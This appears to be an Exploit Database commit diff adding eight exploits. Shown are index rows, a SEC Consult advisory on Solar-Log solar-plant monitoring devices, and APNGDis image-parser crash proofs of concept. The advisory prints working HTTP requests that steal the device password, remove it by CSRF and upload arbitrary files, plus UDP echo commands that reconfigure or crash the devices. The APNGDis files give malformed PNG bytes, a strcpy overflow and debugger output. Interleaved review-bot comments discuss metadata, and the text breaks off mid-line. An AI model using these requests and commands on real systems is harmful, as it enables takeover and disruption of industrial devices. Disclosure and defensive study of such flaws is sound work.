From 8b5b662af977e7d922bc16df4032d7e73eaa5c13 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Mar 2017 05:01:16 +0000 Subject: [PATCH] DB: 2017-03-23 8 new exploits SpyCamLizard 1.230 - Denial of Service APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow APNGDis 2.8 - 'filename' Stack Buffer Overflow Disk Sorter Enterprise 9.5.12 - 'GET' Buffer Overflow (SEH) SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit) GLink Word Link Script 1.2.3 - SQL Injection Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities --- files.csv | 8 + platforms/hardware/webapps/41671.txt | 296 +++++++++++++++++++++++++++ platforms/multiple/dos/41668.txt | 62 ++++++ platforms/multiple/dos/41669.txt | 147 +++++++++++++ platforms/multiple/dos/41670.txt | 96 +++++++++ platforms/php/webapps/41665.txt | 24 +++ platforms/windows/dos/41667.py | 36 ++++ platforms/windows/remote/41666.py | 85 ++++++++ platforms/windows/remote/41672.rb | 80 ++++++++ 9 files changed, 834 insertions(+) create mode 100755 platforms/hardware/webapps/41671.txt create mode 100755 platforms/multiple/dos/41668.txt create mode 100755 platforms/multiple/dos/41669.txt create mode 100755 platforms/multiple/dos/41670.txt create mode 100755 platforms/php/webapps/41665.txt create mode 100755 platforms/windows/dos/41667.py create mode 100755 platforms/windows/remote/41666.py create mode 100755 platforms/windows/remote/41672.rb diff --git a/files.csv b/files.csv index 16ef162cc..be69c1939 100644 --- a/files.csv +++ b/files.csv 
@@ -5420,6 +5420,10 @@ id,file,description,date,author,platform,type,port
 41659,platforms/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0
 41660,platforms/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",multiple,dos,0
 41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0
+41667,platforms/windows/dos/41667.py,"SpyCamLizard 1.230 - Denial of Service",2017-03-22,ScrR1pTK1dd13,windows,dos,0
+41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
+41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
+41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
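Review bot: The new row for 41667 credits `ScrR1pTK1dd13` as author, but the header of platforms/windows/dos/41667.py gives `# Exploit Author: Greg Priest` and lists the handle only under `# Created:`; the index and the file should agree on which name is canonical, since the other rows added in this commit copy the file's `# Exploit Author:` line verbatim. The dates in the four new rows do match the `Date` fields of their files.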
@@ -15353,6 +15357,8 @@ id,file,description,date,author,platform,type,port
 41613,platforms/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,windows,remote,8800
 41614,platforms/multiple/remote/41614.rb,"Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,multiple,remote,8080
 41638,platforms/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,windows,remote,0
+41666,platforms/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",windows,remote,0
+41672,platforms/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-03-22,Metasploit,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37574,3 +37580,5 @@ id,file,description,date,author,platform,type,port
 41644,platforms/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80
 41662,platforms/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps,0
 41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0
+41665,platforms/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",php,webapps,0
+41671,platforms/hardware/webapps/41671.txt,"Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities",2017-03-22,"SEC Consult",hardware,webapps,0
diff --git a/platforms/hardware/webapps/41671.txt b/platforms/hardware/webapps/41671.txt
new file mode 100755
index 000000000..8f25e0fa0
--- /dev/null
+++ b/platforms/hardware/webapps/41671.txt
@@ -0,0 +1,296 @@ +SEC Consult Vulnerability Lab Security Advisory < 20170322-0 > +======================================================================= + title: Multiple vulnerabilities + product: Solare Datensysteme GmbH + Solar-Log 250/300/500/800e/1000/1000 PM+/1200/2000 + vulnerable version: Firmware 2.8.4-56 / 3.5.2-85 + fixed version: Firmware 3.5.3-86 + CVE number: - + impact: Critical + homepage: http://www.solar-log.com/de/home.html + found: 2017-01-23 + by: T. Weber (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow + Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"Solare Datensysteme GmbH (SDS) is headquartered in the southern German city +of Binsdorf and specialises in the development and sale of monitoring systems +for photovoltaic plants. The company was founded in 2007 by Thomas Preuhs and +Jörg Karwath and was created from the company "TOP Solare Datensysteme". This +company had been developing and selling the "SolarLogâ„¢" product range since +2005. Our core competence covers innovative products with short development +cycles and an excellent cost/performance ratio. Our developments have the +outstanding characteristics of high customer value, simple operation and +universal application without requiring time-consuming installation of +software." + +Source: http://www.solar-log.uk/gb-en/unternehmen/ueber-uns.html + + +Business recommendation: +------------------------ +SEC Consult recommends to immediately install the available firmware update +and restrict network access. + +Furthermore, this device should not be used in production until a thorough +security review has been performed by security professionals and all +identified issues have been resolved. 
+ + +Vulnerability overview/description: +----------------------------------- +1) Unauthenticated Download of Configuration including Device-Password +This vulnerability is present at least on firmware 2.8.4-56. + +An attacker can download the configuration file without authentication and +extract the password to login to Solar-Log. Therefore, an attacker can gain +administrative access to such a device without prior authentication. + + +2) Cross-Site Request Forgery (CSRF) +This vulnerability is present at least on firmware 3.5.2-85. + +A CSRF vulnerability enables an attacker to remove/modify a password of a +device by luring an authenticated user to click on a crafted link. An attacker +is able to take over the device by exploiting this vulnerability. + + +3) Unauthenticated Arbitrary File Upload +This vulnerability is present at least on firmware 3.5.2-85. + +Any files can be uploaded on the Solar-Log by using a crafted POST request. An +attacker can start a malicious website or use the Solar-Log as share to store +any (illegal) contents. + + +4) Information Disclosure (CVE-2001-1341) +All Solar-Log devices in the current firmware versions are prone to this +information disclosure vulnerability. (2.8.4-56 / 3.5.2-85) + +The network configuration of the internal network including the gateway and +the MAC address of the device are leaked. + +All details of the IPC@CHIP from Beck IPC (https://www.beck-ipc.com/) like RTOS +version and serial number are leaked as well. + + +5) Unauthenticated Change of Network-Configuration +All Solar-Log devices in the current firmware versions are prone to this +vulnerability. (2.8.4-56 / 3.5.2-85) + +Since the Solar-Log is based on the chips of Beck IPC a UDP configuration +server is enabled by default. This server allows to change the IP configuration +over a specific UDP port. This functionality can be protected with a password, +but this is not set in the affected firmware versions. 
+ +The MAC address, which is leaked by 4), is needed to configure the device. +An attacker can reconfigure the device without any authentication. + + +6) Unauthenticated Denial of Service +All Solar-Log devices in the current firmware versions are prone to this +vulnerability. (2.8.4-56 / 3.5.2-85) + +The Beck IPC UDP configuration server on Solar-Log device can be attacked with +arbitrary UDP packets to permanently disable the Solar-Log until a manual +reboot is triggered. + + +7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory +Potentially available in all Solar-Log devices in the current firmware +versions. (2.8.4-56 / 3.5.2-85) + +Since the "CHIPTOOL" from BECK IPC enables a developer to reprogram the chip +over the network via UDP, a missing password can also enable an attacker to do +this on a Solar-Log device. This action can lead to a simple Denial of Service +or a complex botnet of Solar-Log devices! + + +Proof of concept: +----------------- +1) Unauthenticated Download of Configuration including Device-Password +The full configuration is exposed by sending the following GET-request: +------------------------------------------------------------------------------- +GET /data/misc.dat HTTP/1.1 +Host: +[...] +------------------------------------------------------------------------------- +Since the response contains the password, an attacker can easily take +control over the device. 
+ + +2) Cross-Site Request Forgery +By luring the user to issue the following request, the password is removed: +------------------------------------------------------------------------------- +POST /setjp HTTP/1.1 +Host: + +preval=none;postval=105;{"221":"0","223":"0","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"} +------------------------------------------------------------------------------- + +By luring the user to issue the following request, the password is modified: +------------------------------------------------------------------------------- +POST /setjp HTTP/1.1 +Host: + +preval=none;postval=105;{"221":"0","223":"1","224":"","225":"1","287":"","288":{"0":"0","1":"0"},"440":"0"} +------------------------------------------------------------------------------- + + +3) Unauthenticated Arbitrary File Upload +Any files can be uploaded by using the following POST-request: +------------------------------------------------------------------------------- +POST /menu/d_debug_db.html HTTP/1.1 +Host: +[...] +Referer: http:///menu/d_debug_db.html +Content-Type: multipart/form-data; boundary=--------301473270 +Content-Length: 341 + +----------301473270 +Content-Disposition: form-data; name="DESTINATION-PATH" + +PoC.html +----------301473270 +Content-Disposition: form-data; name="FILE-CONTENT"; filename="file.txt" +Content-Type: text/plain + + + + SEC-Test + + + + + +----------301473270 +Content-Disposition: form-data; name="L_UPLOAD" + +Hochladen +----------301473270-- +------------------------------------------------------------------------------- + +The uploaded content can be reached by this link: +http:///PoC.html + + +4) Information Disclosure (CVE-2001-1341) +This vulnerability is a known issue to IPC@CHIP since 2001. 
+See: http://www.securityfocus.com/bid/2767/info + +The following URL can be used to open the "ChipCfg" file on a Solar-Log device: +http:///ChipCfg + +If an attacker is in the same subnet, he can directly request this information +from the device (the device responds to multicast) with the following command: +$ echo -n "0 1 A" >/dev/udp//8001 + + +5) Unauthenticated Change of Network-Configuration +By using the following command a change of the network configuration can be +triggerd unauthenticated on UDP port 8001: +$ echo -n " 4 2 0 " >/dev/udp//8001 + +Example: +$ echo -n "001122334455 4 2 0 192.168.4.5 255.255.255.0 192.168.4.254" >/dev/udp/192.168.4.9/8001 + + +6) Unauthenticated Denial of Service +By using arbitrary null characters the IPC@CHIP can be pushed into an +undesired state: +$ echo -n " 0 DDDD\0\0" >/dev/udp//8001 + +Example: +$ echo -n "001122334455 0 192.168.4.5 255.255.255.0 192.168.4.254 DDDD\0\0" >/dev/udp/192.168.4.5/8001 + + +7) Potential Unauthenticated Reprogram of IPC@CHIP Flash Memory +This action was not tested against the device. Such attack can brick the +Solar-Log. The worst case scenario would be a botnet exploiting this vulnerability. + +A network-dump of the "CHIPTOOL" would be enough to reconstruct the required +UDP packets for the attack. + + +Vulnerable / tested versions: +----------------------------- +Solar-Log 1200 - 3.5.2-85 +Solar-Log 800e - 2.8.4-56 + +Since the firmware for the other Solar-Log devices is exactly the same, +other devices with the same versions are also prone to the vulnerabilities! + + +Vendor contact timeline: +------------------------ +2017-02-02: Contacting vendor via info@solar-log.com, support@solar-log.com + and berlin@solar-log.com. +2017-02-14: Vendor responds and requests the advisory unencrypted; Sent the + advisory unencrypted to the vendor. +2017-02-20: Asked for an update. +2017-02-21: Vendor states that the patch is in development. The update will + be published before 2017-03-24. 
+2017-03-14: Asked for a status update. Vendor states that the update will + be available on 2017-03-21. +2017-03-20: Vendor sends release notes. New firmware version is 3.5.3 build + 86 for all affected Solar-Log devices. + Informing the vendor that the release of the advisory is set to + 2017-03-22. +2017-03-22: Public advisory release. + + +Solution: +--------- +Upgrade to firmware 3.5.3-86 +http://www.solar-log.com/de/service-support/downloads/firmware.html + + +Workaround: +----------- +Restrict network access to the devices. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow +Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/Career.htm + +Interested in improving your cyber security with the experts of SEC Consult? 
+Contact our local offices https://www.sec-consult.com/en/About/Contact.htm +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF T. Weber / @2017 \ No newline at end of file diff --git a/platforms/multiple/dos/41668.txt b/platforms/multiple/dos/41668.txt new file mode 100755 index 000000000..4244d034d --- /dev/null +++ b/platforms/multiple/dos/41668.txt 
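Review bot: The header field `CVE number: -` disagrees with the body, where issue 4 is explicitly tracked as CVE-2001-1341; the header should either carry that identifier or say that only the IPC@CHIP information disclosure has one. Angle-bracket placeholders appear to have been stripped on import, so the request templates now read `Host:`, `http:///ChipCfg` and `>/dev/udp//8001`, and the PoC.html body in issue 3 has lost its markup — the stored copy should restore the placeholders or mark them as removed so readers do not take the blank fields literally. In issue 5 of the proof of concept, `triggerd` is a typo for `triggered`. For defenders the actionable lines are the fixed firmware 3.5.3-86 and the workaround of restricting network access to the device, which should explicitly include UDP port 8001 used by the configuration server described in issues 5 and 6.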
@@ -0,0 +1,62 @@ +# Exploit Title: APNGDis chunk size descriptor Buffer Overflow +# Date: 14-03-2017 +# Exploit Author: Alwin Peppels +# Vendor Homepage: http://apngdis.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ +# Version: 2.8 +# Tested on: Linux Debian / Windows 7 +# CVE : CVE-2017-6191 + + +Additional analysis: +https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-chunk-size-descriptor-buffer-overflow + +POC: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41668.png + +The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4 + + ‰ P N G . . . . ÿ ÿ ÿ ô I H D R +89 50 4E 47 0D 0A 1A 0A FF FF FF F4 49 48 44 52 + ^ ^ ^ ^ + +Bash: + +Reading '../ihdr_chunk_size_poc.png'... +*** Error in `./apngdis': free(): invalid next size (fast): 0x00005556a08d2270 *** +======= Backtrace: ========= +/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f932b0adbcb] +/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f932b0b3f96] +/lib/x86_64-linux-gnu/libc.so.6(+0x7778e)[0x7f932b0b478e] +./apngdis(+0x2e2f)[0x55569f636e2f] +./apngdis(+0x324f)[0x55569f63724f] +/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f932b05d2b1] +./apngdis(+0x16ca)[0x55569f6356ca] + + +Valgrind: + +Reading '../ihdr_chunk_size_poc.png'... 
+==10383== Invalid write of size 4 +==10383== at 0x10B502: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:113) +==10383== by 0x109F96: load_apng(char*, std::vector >&) (apngdis.cpp:206) +==10383== by 0x10B24E: main (apngdis.cpp:498) +==10383== Address 0x5ed3370 is 0 bytes after a block of size 0 alloc'd +==10383== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423) +==10383== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112) +==10383== by 0x109F96: load_apng(char*, std::vector >&) (apngdis.cpp:206) +==10383== by 0x10B24E: main (apngdis.cpp:498) +==10383== +==10383== Invalid write of size 1 +==10383== at 0x4C330AD: __GI_mempcpy (vg_replace_strmem.c:1518) +==10383== by 0x5B94B0D: _IO_file_xsgetn (fileops.c:1400) +==10383== by 0x5B89AA8: fread (iofread.c:38) +==10383== by 0x10B52B: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:114) +==10383== by 0x109F96: load_apng(char*, std::vector >&) (apngdis.cpp:206) +==10383== by 0x10B24E: main (apngdis.cpp:498) +==10383== Address 0x5ed338c is 28 bytes after a block of size 0 in arena "client" +==10383== + +valgrind: m_mallocfree.c:303 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed. +valgrind: Heap block lo/hi size mismatch: lo = 64, hi = 90194313415. diff --git a/platforms/multiple/dos/41669.txt b/platforms/multiple/dos/41669.txt new file mode 100755 index 000000000..b607ae23d --- /dev/null +++ b/platforms/multiple/dos/41669.txt 
@@ -0,0 +1,147 @@ +# Exploit Title: APNGDis image width / height Buffer Overflow +# Date: 14-03-2017 +# Exploit Author: Alwin Peppels +# Vendor Homepage: http://apngdis.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ +# Version: 2.8 +# Tested on: Linux Debian / Windows 7 +# CVE : CVE-2017-6192 + +Additional analysis: +https://www.onvio.nl/nieuws/cve-2017-6192-apngdis-width-height-buffer-overflow + +POC: + +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41669.png + +In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values: + +‰ P N G . . . . . . . . I H D R +89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 + +. . . . . . . . +00 0F 00 00 00 0F 00 00 + +^ ^ ^ ^ ^ ^ ^ ^ + +Valgrind: + + +Reading '../w_h_chunk_poc.png'... +==10563== Invalid read of size 8 +==10563== at 0x4C30260: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x5edb3c8 is 28,792 bytes inside a block of size 65,593 free'd +==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530) +==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176) +==10563== by 0x10A9FD: load_apng(char*, std::vector >&) (apngdis.cpp:361) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Block was alloc'd at +==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299) +==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54DAF2D: ??? 
(in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58) +==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158) +==10563== by 0x10A891: load_apng(char*, std::vector >&) (apngdis.cpp:337) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== Invalid write of size 8 +==10563== at 0x4C30265: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x5edbad8 is 30,600 bytes inside a block of size 65,593 free'd +==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530) +==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176) +==10563== by 0x10A9FD: load_apng(char*, std::vector >&) (apngdis.cpp:361) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Block was alloc'd at +==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299) +==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58) +==10563== by 0x54CA2E0: ??? 
(in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158) +==10563== by 0x10A891: load_apng(char*, std::vector >&) (apngdis.cpp:337) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== Invalid read of size 8 +==10563== at 0x4C30272: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x5edb3b8 is 28,776 bytes inside a block of size 65,593 free'd +==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530) +==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176) +==10563== by 0x10A9FD: load_apng(char*, std::vector >&) (apngdis.cpp:361) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Block was alloc'd at +==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299) +==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58) +==10563== by 0x54CA2E0: ??? 
(in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0) +==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158) +==10563== by 0x10A891: load_apng(char*, std::vector >&) (apngdis.cpp:337) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== Invalid read of size 8 +==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== Address 0x0 is not stack'd, malloc'd or (recently) free'd +==10563== +==10563== +==10563== Process terminating with default action of signal 11 (SIGSEGV) +==10563== Access not within mapped region at address 0x0 +==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017) +==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78) +==10563== by 0x10AA40: load_apng(char*, std::vector >&) (apngdis.cpp:363) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== If you believe this happened as a result of a stack +==10563== overflow in your program's main thread (unlikely but +==10563== possible), you can try to increase the size of the +==10563== main thread stack using the --main-stacksize= flag. +==10563== The main thread stack size used in this run was 8388608. 
+==10563== +==10563== HEAP SUMMARY: +==10563== in use at exit: 16,777,901 bytes in 10 blocks +==10563== total heap usage: 24 allocs, 14 frees, 16,997,058 bytes allocated +==10563== +==10563== 64 bytes in 2 blocks are definitely lost in loss record 6 of 9 +==10563== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423) +==10563== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112) +==10563== by 0x10A24D: load_apng(char*, std::vector >&) (apngdis.cpp:244) +==10563== by 0x10B24E: main (apngdis.cpp:498) +==10563== +==10563== LEAK SUMMARY: +==10563== definitely lost: 64 bytes in 2 blocks +==10563== indirectly lost: 0 bytes in 0 blocks +==10563== possibly lost: 0 bytes in 0 blocks +==10563== still reachable: 16,777,837 bytes in 8 blocks +==10563== suppressed: 0 bytes in 0 blocks +==10563== Reachable blocks (those to which a pointer was found) are not shown. +==10563== To see them, rerun with: --leak-check=full --show-leak-kinds=all +==10563== +==10563== For counts of detected and suppressed errors, rerun with: -v +==10563== ERROR SUMMARY: 1028641 errors from 5 contexts (suppressed: 0 from 0) +Segmentation fault + + + + +w_h_chunk_poc.png + diff --git a/platforms/multiple/dos/41670.txt b/platforms/multiple/dos/41670.txt new file mode 100755 index 000000000..7919428c8 --- /dev/null +++ b/platforms/multiple/dos/41670.txt 
@@ -0,0 +1,96 @@ +# Exploit Title: APNGDis filename Buffer Overflow +# Date: 14-03-2017 +# Exploit Author: Alwin Peppels +# Vendor Homepage: http://apngdis.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ +# Version: 2.8 +# Tested on: Linux Debian / Windows 7 +# CVE : CVE-2017-6191 + +Additional analysis: +https://www.onvio.nl/nieuws/cve-2017-6191-apngdis-filename-buffer-overflow + +Textbook buffer overflow; a fixed size buffer gets allocated with +szPath[256], and the first command line argument is stored without +validation. + + +int main(int argc, char** argv) +{ + unsigned int i, j; + char * szInput; + char * szOutPrefix; + char szPath[256]; + char szOut[256]; + std::vector frames; + printf("\nAPNG Disassembler 2.8\n\n"); + + if (argc > 1) + szInput = argv[1]; + else + { + printf("Usage: apngdis anim.png [name]\n"); + return 1; + } + strcpy(szPath, szInput); +} + + + + +With 'A' * 1000 as argv[1] : + + +GDB: + +Program received signal SIGSEGV, Segmentation fault. +strlen () at ../sysdeps/x86_64/strlen.S:106 +106 ../sysdeps/x86_64/strlen.S: No such file or directory. 
+(gdb) i r +rax 0x4141414141414141 4702111234474983745 +rbx 0x7ffff70ea600 140737338320384 +rcx 0x141 321 +rdx 0x0 0 +rsi 0x7fffffffca40 140737488341568 +rdi 0x4141414141414141 4702111234474983745 +rbp 0x7fffffffceb0 0x7fffffffceb0 +rsp 0x7fffffffc948 0x7fffffffc948 +r8 0x4141414141414141 4702111234474983745 +r9 0x9 9 +r10 0x73 115 +r11 0x7fffffffce78 140737488342648 +r12 0x555555558c9f 93824992251039 +r13 0x7fffffffcec8 140737488342728 +r14 0x0 0 +r15 0xffffffffffffffff -1 +rip 0x7ffff6dd1486 0x7ffff6dd1486 +eflags 0x10297 [ CF PF AF SF IF RF ] + + +Valgrind: + +==10685== Invalid read of size 1 +==10685== at 0x4C2EDA2: strlen (vg_replace_strmem.c:454) +==10685== by 0x5B6ADA2: vfprintf (vfprintf.c:1637) +==10685== by 0x5B711F8: printf (printf.c:33) +==10685== by 0x109F05: load_apng(char*, std::vector >&) (apngdis.cpp:200) +==10685== by 0x10B24E: main (apngdis.cpp:498) +==10685== Address 0x4141414141414141 is not stack'd, malloc'd or +(recently) free'd +==10685== +==10685== +==10685== Process terminating with default action of signal 